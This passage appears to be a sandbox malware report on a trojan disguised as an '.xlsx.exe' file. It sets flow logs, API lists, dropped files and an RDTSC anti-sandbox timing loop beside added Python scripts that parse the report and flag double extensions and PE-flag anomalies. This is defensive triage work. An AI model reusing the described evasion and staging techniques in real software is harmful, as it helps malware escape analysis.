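The region decode separates the two kinds of hit on this page: the URL strings sit in PAGE_READWRITE / MEM_PRIVATE heap memory of process 2 (runtime data, written after the download stage ran), while the OriginalFilename string sits in a PAGE_READONLY / MEM_IMAGE region of the loaded executable itself (static resource data). Blocking or hunting on the collapsed URL, or just on the file id, avoids chasing the thirteen garbage-suffixed variants as separate indicators.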
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknown | Network traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49711 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49712 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49721 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49725 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49727 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49758 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49771 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49783 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49793 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49800 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49806 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49812 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49856 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49869 version: TLS 1.2
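The flow entries above record each direction of a connection separately and name no peer, and only the sessions whose TLS handshake was captured get a second entry naming the server IP and protocol version. Joining the two by client port yields one record per session and makes visible which sessions remain unattributed to a server. The script below is an added example written for this page (not Joe Sandbox code); the line list is a constructed subset of the page's entries, and the client port 49713 is included without a matching TLS record to show the unattributed case.

```python
"""Rebuild per-session records from the sandbox flow and TLS entries (added example)."""
import re
from collections import Counter

FLOW_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)"
)
SERVER_PORT = 443

# Constructed subset of the report lines above.
NET_LINES = [
    "Network traffic detected: HTTP traffic on port 49709 -> 443",
    "Network traffic detected: HTTP traffic on port 443 -> 49709",
    "Network traffic detected: HTTP traffic on port 49711 -> 443",
    "Network traffic detected: HTTP traffic on port 443 -> 49711",
    "Network traffic detected: HTTP traffic on port 49713 -> 443",
    "Network traffic detected: HTTP traffic on port 443 -> 49713",
    "Network traffic detected: HTTP traffic on port 49712 -> 443",
    "HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49709 version: TLS 1.2",
    "HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49711 version: TLS 1.2",
    "HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49712 version: TLS 1.2",
]


def build_sessions(lines, server_port=SERVER_PORT):
    """Return {client_port: {"out": bool, "in": bool, "server": ip|None, "tls": ver|None}}.

    Flow lines give only the port pair, so direction is inferred from which
    side is the server port; TLS lines are recorded server -> client on this
    page, so the client port is the destination of that line.
    """
    sessions = {}

    def rec(port):
        return sessions.setdefault(
            port, {"out": False, "in": False, "server": None, "tls": None}
        )

    for line in lines:
        m = FLOW_RE.search(line)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            if dst == server_port:
                rec(src)["out"] = True      # client -> server
            elif src == server_port:
                rec(dst)["in"] = True       # server -> client
            continue
        m = TLS_RE.search(line)
        if m:
            server_ip, sport, _client_ip, cport, version = m.groups()
            if int(sport) == server_port:
                r = rec(int(cport))
                r["server"], r["tls"] = server_ip, version
    return sessions


def summarize(sessions):
    """Counts a triager wants: sessions, one-sided flows, and attributed peers."""
    servers = Counter(s["server"] for s in sessions.values() if s["server"])
    return {
        "sessions": len(sessions),
        "bidirectional": sum(1 for s in sessions.values() if s["out"] and s["in"]),
        "unattributed": sorted(p for p, s in sessions.items() if s["server"] is None),
        "servers": dict(servers),
    }


if __name__ == "__main__":
    sessions = build_sessions(NET_LINES)
    for port, s in sorted(sessions.items()):
        print(port, s)
    print(summarize(sessions))
```

Run over the full list on this page the same join gives 39 client ports against only 15 TLS records and two server IPs, both Google address space, which is consistent with the Drive download URL found in memory: the sample's C2-less staging goes entirely through legitimate infrastructure, so the useful network indicator is the Drive file id rather than the IPs.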
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_0040335A EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | File created: C:\Windows\resources\0809
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_00404B6E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_0040659D
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_00404B6E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_0040659D
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: String function: 00402B3A appears 49 times
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000000.1483122569.000000000044A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs 09-FD-94.03.60.175.07.xlsx.exe
      Source: 09-FD-94.03.60.175.07.xlsx.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine | Classification label: mal76.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | File created: C:\Users\user\subacidity.lnk
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | File created: C:\Users\user\AppData\Local\Temp\nsxC3B3.tmp
      Source: 09-FD-94.03.60.175.07.xlsx.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
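Three of the static findings in this block reduce to checks a triage script can reproduce without the sandbox: the double extension in the sample name (the basis of the "Suspicious Double Extension File Execution" detection), the OriginalFilename carved from the VS_VERSION_INFO resource disagreeing with the name on disk ("Sample file is different than original file name gathered from version info"), and the PE flag lists, which are only names here but map to fixed bit values in winnt.h. The script below is an added example written for this page; it is not Joe Sandbox code and the double-extension check is modelled on, not copied from, the Sigma rule. The extension lists are an assumption chosen for illustration, and the inputs are copied from the report lines above.

```python
"""Static checks behind the double-extension, name-mismatch and PE-flag findings (added example)."""
import re

# Assumed lists for the double-extension check; tune to the environment.
DOCUMENT_EXTS = {"xlsx", "xls", "docx", "doc", "pptx", "ppt", "pdf", "txt",
                 "rtf", "csv", "jpg", "jpeg", "png", "gif"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "msi"}

# IMAGE_FILE_* characteristics and IMAGE_SCN_* section flags from winnt.h.
IMAGE_FILE_CHARACTERISTICS = {
    "RELOCS_STRIPPED": 0x0001, "EXECUTABLE_IMAGE": 0x0002,
    "LINE_NUMS_STRIPPED": 0x0004, "LOCAL_SYMS_STRIPPED": 0x0008,
    "LARGE_ADDRESS_AWARE": 0x0020, "32BIT_MACHINE": 0x0100,
    "DEBUG_STRIPPED": 0x0200, "SYSTEM": 0x1000, "DLL": 0x2000,
}
IMAGE_SCN_FLAGS = {
    "IMAGE_SCN_CNT_CODE": 0x00000020, "IMAGE_SCN_CNT_INITIALIZED_DATA": 0x00000040,
    "IMAGE_SCN_CNT_UNINITIALIZED_DATA": 0x00000080, "IMAGE_SCN_MEM_EXECUTE": 0x20000000,
    "IMAGE_SCN_MEM_READ": 0x40000000, "IMAGE_SCN_MEM_WRITE": 0x80000000,
}

# The value sits between the 'OriginalFilename' key and the next resource block;
# the carved string keeps a stray byte between them ('...exeDVarFileInfo$').
ORIGINAL_NAME_RE = re.compile(r"OriginalFilename([^\s\x00]+?\.(?:exe|dll|scr))", re.I)


def file_name(path):
    """Basename that accepts Windows or POSIX separators regardless of host OS."""
    return re.split(r"[\\/]", path)[-1]


def is_double_extension(path):
    """True for names like report.xlsx.exe: executable last, document before it."""
    parts = file_name(path).lower().split(".")
    return len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTS and parts[-2] in DOCUMENT_EXTS


def original_filename(dump_string):
    """OriginalFilename from a carved VS_VERSION_INFO string, or None."""
    m = ORIGINAL_NAME_RE.search(dump_string)
    return m.group(1) if m else None


def name_mismatch(path, dump_string):
    orig = original_filename(dump_string)
    return orig is not None and orig.lower() != file_name(path).lower()


def flags_value(names, table):
    """Combine flag names into the numeric field; unknown names raise KeyError."""
    value = 0
    for name in names:
        value |= table[name]
    return value


def flags_names(value, table):
    return [name for name, bit in table.items() if value & bit]


def static_report(path, version_dump, characteristics, text_section_flags):
    chars = flags_value(characteristics, IMAGE_FILE_CHARACTERISTICS)
    return {
        "double_extension": is_double_extension(path),
        "original_filename": original_filename(version_dump),
        "name_mismatch": name_mismatch(path, version_dump),
        "characteristics": chars,
        # RELOCS_STRIPPED: the loader cannot rebase the image, so no ASLR.
        "relocatable": not chars & IMAGE_FILE_CHARACTERISTICS["RELOCS_STRIPPED"],
        "text_section": flags_value(text_section_flags, IMAGE_SCN_FLAGS),
    }


if __name__ == "__main__":
    r = static_report(
        r"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",
        "OriginalFilenamebiliousnesses.exeDVarFileInfo$",
        ["RELOCS_STRIPPED", "EXECUTABLE_IMAGE", "LINE_NUMS_STRIPPED",
         "LOCAL_SYMS_STRIPPED", "32BIT_MACHINE"],
        ["IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"],
    )
    for k, v in r.items():
        print(f"{k}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k}: {v}")
```

RELOCS_STRIPPED is worth decoding rather than just listing: an image without a relocation table cannot be rebased, so it always loads at its preferred base without ASLR, which is why every function address the report cites sits in the 0x0040xxxx range of a 0x00400000 image base. The .text flags (code, execute, read, no write) are the normal layout; a writable code section would be the anomaly to flag.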
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: 09-FD-94.03.60.175.07.xlsx.exe | ReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | File read: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
      Source: unknown | Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.0.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      Source: Yara match | File source: 00000002.00000002.2751336924.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1600421494.0000000007ED3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062B2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | File created: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | API/Special instruction interceptor: Address: 805F3C6
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | API/Special instruction interceptor: Address: 4BCF3C6
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | RDTSC instruction interceptor: First address: 801FC59 second address: 801FC59 instructions:
          0x00000000 rdtsc
          0x00000002 cmp ebx, 0BE15CA1h
          0x00000008 test dh, ah
          0x0000000a cmp ebx, ecx
          0x0000000c jc 00007F11BCF30680h
          0x0000000e inc ebp
          0x0000000f inc ebx
          0x00000010 cmp ah, bh
          0x00000012 rdtsc
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | RDTSC instruction interceptor: First address: 4B8FC59 second address: 4B8FC59 instructions:
          0x00000000 rdtsc
          0x00000002 cmp ebx, 0BE15CA1h
